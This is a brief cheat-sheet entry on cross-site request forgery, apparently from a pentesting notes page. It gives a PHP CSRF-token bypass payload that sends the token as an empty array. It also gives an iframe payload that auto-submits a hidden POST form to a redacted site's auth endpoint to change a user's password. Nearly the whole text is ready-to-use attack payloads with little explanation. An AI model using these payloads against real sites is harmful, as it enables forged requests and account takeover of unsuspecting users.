Cross Site Request Forgery (CSRF)
- PHP CSRF Protection Bypass : EXPLOIT : csrftoken[]=&message=x -> Supply an empty array on the CSRF token parameter. You can find multiple csrf protection frameworks on GitHub which are vulnerable.
-

Got the solution :
<iframe src='data:text/html,<body onload="document.forms[0].submit()"><form action="//redacted.com/api/auth?password=Chang3dd" method="post"></body>'></iframe>
Last modified 2yr ago